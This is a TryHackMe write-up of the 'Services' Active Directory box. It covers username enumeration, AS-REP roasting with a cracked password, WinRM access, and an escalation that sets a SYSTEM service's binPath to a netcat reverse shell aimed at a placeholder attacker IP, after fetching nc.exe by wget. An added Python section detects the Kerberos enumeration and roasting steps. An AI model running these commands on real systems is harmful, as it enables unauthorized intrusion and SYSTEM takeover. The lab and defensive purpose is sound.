// htb writeup TryHackMe 2026-02-25

🧪 Services – TryHackMe

IP Address: 10.201.39.158
Difficulty: Medium
Platform: TryHackMe


🧭 Overview

This box was a Windows Server in an Active Directory environment.
The attack path involved enumerating usernames from a website, validating them with Kerbrute, performing an AS-REP roast to get a password, obtaining WinRM access, and then abusing Server Operators group membership to modify a service for privilege escalation to SYSTEM.


🔍 Enumeration

Nmap / Rustscan

rustscan --ulimit 5000 -a $target -- -sC -sV -Pn -oN nmap_full

Findings:


SMB Enumeration

netexec smb $target -u '' -p ''
netexec smb $target -u 'guest' -p ''

Web Enumeration


Username Generation

python ~/THM/Roasted/AD-Username-Generator/username-generate.py -u users.txt -o generated_users.txt

Kerbrute User Enumeration

kerbrute userenum generated_users.txt --dc $target -d services.local

Valid users found:


AS-REP Roasting

impacket-GetNPUsers services.local/ -dc-ip $target -usersfile kusers.txt -outputfile hashes.txt

Hash cracked with:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Password: Serviceworks1
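
Detection view of the Kerbrute and AS-REP roasting steps above, as an added example that is not part of the original writeup: both steps surface on the domain controller as Security event 4768, and this sketch flags them from that event's EventData fields. The sample records, the addresses, every user name except j.rock, and the threshold of 3 are constructed assumptions.

```python
from collections import defaultdict

ENUM_THRESHOLD = 3  # assumed: distinct unknown principals per source before alerting

def ev(user, ip, status, preauth, etype):
    """Build one constructed 4768 record using the event's EventData field names."""
    return {"TargetUserName": user, "IpAddress": ip, "Status": status,
            "PreAuthType": preauth, "TicketEncryptionType": etype}

# Constructed sample data; addresses and all names except j.rock are invented.
EVENTS = [
    ev("a.smith", "::ffff:192.0.2.50", "0x6", "-", "0xFFFFFFFF"),
    ev("b.jones", "::ffff:192.0.2.50", "0x6", "-", "0xFFFFFFFF"),
    ev("c.brown", "::ffff:192.0.2.50", "0x6", "-", "0xFFFFFFFF"),
    ev("j.rock", "::ffff:192.0.2.50", "0x0", "0", "0x17"),   # TGT issued without pre-auth, RC4
    ev("m.admin", "::ffff:192.0.2.21", "0x0", "2", "0x12"),  # normal logon: timestamp pre-auth, AES256
    ev("t.typo", "::ffff:192.0.2.21", "0x6", "-", "0xFFFFFFFF"),  # one mistyped name, below threshold
]

def detect(events, enum_threshold=ENUM_THRESHOLD):
    """Return alert tuples for pre-auth-less TGTs and per-source user enumeration."""
    unknown = defaultdict(set)  # source IP -> user names rejected with 0x6
    alerts = []
    for e in events:
        ip = e["IpAddress"].replace("::ffff:", "")  # DCs log IPv4-mapped addresses
        status = e["Status"].lower()
        if status == "0x6":  # KDC_ERR_C_PRINCIPAL_UNKNOWN: name not in the directory
            unknown[ip].add(e["TargetUserName"].lower())
        elif status == "0x0" and e["PreAuthType"] == "0":
            # Success with no pre-authentication: the reply can be cracked offline.
            sev = "high" if e["TicketEncryptionType"].lower() == "0x17" else "medium"
            alerts.append(("asrep_no_preauth", ip, e["TargetUserName"], sev))
    for ip, names in sorted(unknown.items()):
        if len(names) >= enum_threshold:
            alerts.append(("user_enumeration", ip, len(names), "medium"))
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The 0x6 failure records only exist when failure auditing for the Kerberos Authentication Service is enabled on the domain controller.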

🎯 Foothold

WinRM Access

netexec winrm $target -u 'j.rock' -p 'Serviceworks1'
evil-winrm -u 'j.rock' -p 'Serviceworks1' -i $target

Retrieved user.txt:

THM{ASr3p_R0****************}

🚀 Privilege Escalation

Enumeration


Service Abuse

Identified AWSLiteAgent service running with SYSTEM privileges.

Uploaded netcat:

wget http://<attacker-ip>/nc.exe -o nc.exe

Changed service binary path:

sc.exe config AWSLiteAgent binPath="C:\Users\j.rock\Desktop\nc.exe -e cmd.exe <attacker-ip> 80"
sc.exe stop AWSLiteAgent
sc.exe start AWSLiteAgent

SYSTEM Shell

nc -lvnp 80

Connected as NT AUTHORITY\SYSTEM.

Retrieved root.txt:

THM{S3rv3r_0p************}

📜 Lessons Learned

